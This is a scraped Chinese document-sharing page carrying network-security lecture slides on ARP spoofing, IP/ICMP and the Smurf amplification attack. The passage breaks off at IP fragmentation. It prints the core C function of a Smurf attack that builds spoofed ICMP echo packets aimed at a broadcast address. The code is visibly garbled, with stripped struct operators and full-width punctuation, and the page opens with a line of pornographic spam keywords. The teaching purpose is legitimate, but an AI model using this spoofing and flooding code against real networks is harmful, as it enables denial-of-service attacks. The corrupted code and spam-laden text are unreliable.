freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

保障與安全攻擊6網(wǎng)絡(luò)協(xié)議攻擊-文庫吧

2024-12-25 20:29 本頁面


【正文】 修改 、 切斷 、 劫持主機 A、 B之間的通信 。 需要注意的是 , ARP緩存有一定的有效期 。 針對這一點 , 可以編寫簡單的軟件 , 給目標機器一直發(fā)送ARP響應(yīng) , 保證目標機器的 ARP緩存有效 。 某些 ARP實現(xiàn)會試著給緩存中的各個映射發(fā)送請求 。 這將給攻擊者帶來一定的麻煩 , 因為真正的 IP地址會對請求做出響應(yīng) 。 不過 ARP系統(tǒng)的無狀態(tài)本性再次幫了黑客的忙 , 也就是在請求被發(fā)送之前 , 黑客先對請求做出響應(yīng)從而防止請求被發(fā)送 。 網(wǎng)絡(luò)協(xié)議攻擊 20 (2) 發(fā)送 ARP請求 , 源 IP地址為目標的 IP地址 , 而源 MAC地址填充目標 MAC地址以外的其它 MAC地址 。這種方式將刷新所有網(wǎng)段內(nèi)主機的 Cache, 同時 , 目標主機將彈出如下對話框如圖 6所示 。 因為目標發(fā)現(xiàn)網(wǎng)段內(nèi)存在一 IP地址與本機 IP地址相同的主機 。 網(wǎng)絡(luò)協(xié)議攻擊 21 圖 86 地址出現(xiàn)沖突 網(wǎng)絡(luò)協(xié)議攻擊 22 利用前面介紹的 ARP欺騙還可以演變很多種攻擊方式 ,如拒絕服務(wù)攻擊等 。 雖然 , ARP攻擊被說得很神奇 , 但是仔細想一下 , 就可以知道 ARP攻擊只能被用于本地網(wǎng)絡(luò)的假冒 。 這意味著黑客必須已經(jīng)獲得網(wǎng)絡(luò)中某臺機器的訪問權(quán) 。 另外 , ARP請求從來不會被送到路由器以外 。 因此 , 被假冒的機器必須同黑客所控制的機器位于同一網(wǎng)段內(nèi) , 也就是通過集線器或者令牌環(huán)網(wǎng)絡(luò)連接 。 針對 ARP重定向攻擊的最好方法是利用硬件和入侵檢測系統(tǒng),使用交換機而不是集線器。很多交換機可以被配置成硬件地址同特定端口相關(guān)聯(lián),而入侵檢測系統(tǒng)可以識別 LAN中的 IP攻擊。 網(wǎng)絡(luò)協(xié)議攻擊 23 3 網(wǎng)絡(luò)層協(xié)議攻擊 簡介 網(wǎng)際協(xié)議 IP是 TCP/IP的核心 , 也是網(wǎng)絡(luò)層中最重要的協(xié)議 。 IP層接收由更低層 (網(wǎng)絡(luò)接口層 , 例如以太網(wǎng)設(shè)備驅(qū)動程序 )發(fā)來的數(shù)據(jù)包 , 并把該數(shù)據(jù)包發(fā)送到更高層 —— TCP或 UDP層;相反 , IP層也把從 TCP或 UDP層接收來的數(shù)據(jù)包傳送到更低層 。 IP協(xié)議是不可靠的協(xié)議 , 因為 IP并沒有做任何事情來確認數(shù)據(jù)包是按順序發(fā)送的或者是沒有被破壞的 。 IP數(shù)據(jù)包中含有發(fā)送它的主機的 IP地址 (源地址 )和接收它的主機的 IP地址(目的地址 )。 網(wǎng)絡(luò)協(xié)議攻擊 24 ICMP與 IP位于同一層 , 它通常被認為是 IP層的一個組成部分 。 它傳遞差錯報文以及其它需要注意的控制信息 。 ICMP數(shù)據(jù)包是封裝在 IP數(shù)據(jù)包的數(shù)據(jù)部分中進行傳輸?shù)?。 有關(guān) ICMP的協(xié)議格式及數(shù)據(jù)包類型可參考 RFC792。 在網(wǎng)絡(luò)層實施網(wǎng)絡(luò)攻擊造成的主要后果是拒絕服務(wù) (DoS, Denial of Service), 此外就是 IP欺騙 。 下面介紹幾種典型的網(wǎng)絡(luò)層協(xié)議攻擊方式 。 網(wǎng)絡(luò)協(xié)議攻擊 25 網(wǎng)絡(luò)層協(xié)議攻擊 1. ?Smurf攻擊 Smurf攻擊是以最初發(fā)動這種攻擊的程序名 Smurf來命名的 。 這種攻擊方法結(jié)合 IP地址欺騙和 ICMP回復(fù)方法使大量網(wǎng)絡(luò)通信充斥目標系統(tǒng) , 引起目標系統(tǒng)拒絕為正常系統(tǒng)提供服務(wù) 。 當路由器接收到一個發(fā)送給 IP廣播地址 (如) 的分組后 , 把以太網(wǎng)廣播地址FF:FF:FF:FF:FF:FF映射過來 。 這樣路由器從因特網(wǎng)上接收到該分組 , 會對本地網(wǎng)段中的所有主機進行廣播 ,本地網(wǎng)段接收到廣播分組后就對該分組響應(yīng) 。 基于此可以通過如圖 7過程實施攻擊 。 網(wǎng)絡(luò)協(xié)議攻擊 26 圖 7 Smurf攻擊 網(wǎng)絡(luò)協(xié)議攻擊 27 攻擊者向一個具有大量主機和因特網(wǎng)連接的網(wǎng)絡(luò)的廣播地址發(fā)送一個欺騙性 Ping分組 (echo請求 , 類型 8, 代碼0), 這個目標網(wǎng)絡(luò)被稱為反彈站點 , 而欺騙性 Ping分組的源地址就是 Attacker希望攻擊的目標系統(tǒng) 。 由于多數(shù)系統(tǒng)都會盡快地處理 ICMP傳輸信息 , 攻擊者把分組的源地址設(shè)置為目標系統(tǒng) , 因此目標系統(tǒng)很快就會被大量的 echo信息吞沒 , 這樣輕而易舉地就能夠阻止該系統(tǒng)處理其它任何網(wǎng)絡(luò)傳輸 , 從而拒絕為正常系統(tǒng)服務(wù) 。 這種攻擊不僅影響目標系統(tǒng),還影響目標系統(tǒng)所在的因特網(wǎng)連接。如果反彈站點具有 T3連接 (45?Mb/s),而目標系統(tǒng)所在的公司使用的是租用線路 (56 kb/s),則所有進出該公司的通信都會停止下來。 網(wǎng)絡(luò)協(xié)議攻擊 28 Smurf攻擊的核心 C代碼如下: void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip。 struct icmphdr *icmp。 char *packet。 packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 ip = (struct iphdr *)packet。 icmp = (struct icmphdr *) (packet + sizeof(struct iphdr))。 網(wǎng)絡(luò)協(xié)議攻擊 29 memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 /*下面進行 IP數(shù)據(jù)包的封裝,構(gòu)造一個源 IP為目標IP、目的 IP為廣播地址的 ICMP echo請求數(shù)據(jù)包 */ iptot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 ipihl = 5。 ipversion = 4。 ipttl = 255。 iptos = 0。 ipfrag_off = 0。 網(wǎng)絡(luò)協(xié)議攻擊 30 ipprotocol = IPPROTO_ICMP。 /*協(xié)議為 ICMP協(xié)議 */ ipsaddr = 。 /*源地址,應(yīng)為目標IP*/ ipdaddr = dest。 /*目的地址,應(yīng)為某個廣播地址 */ ipcheck = in_chksum((u_short *)ip, sizeof(struct iphdr))。 icmptype = 8。 /*echo請求的類型為 8,代碼為 0*/ icmpcode = 0。 icmpchecksum = in_chksum((u_short *)icmp,sizeof(struct icmphdr) + psize)。 網(wǎng)絡(luò)協(xié)議攻擊 31 sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)amp。sin, sizeof(struct sockaddr))。 free(packet)。 /* free willy! */ } 由以上代碼可以看出 , Smurf攻擊實現(xiàn)非常簡單 。 在 Smurf攻擊中還利用了 IP欺騙的技術(shù) 。 所謂欺騙(Spoofing), 也就是造一個假的源 IP地址的數(shù)據(jù)包 , 當另外的主機接收到這個包 , 會以為包是來自假冒的發(fā)送者 , 這個過程稱為欺騙目標機器 。 網(wǎng)絡(luò)協(xié)議攻擊 32 2. ?IP碎片攻擊 鏈路層具有最大傳輸單元 MTU這個特性 , 它限制了數(shù)據(jù)幀的最大長度 , 不
點擊復(fù)制文檔內(nèi)容
試題試卷相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號-1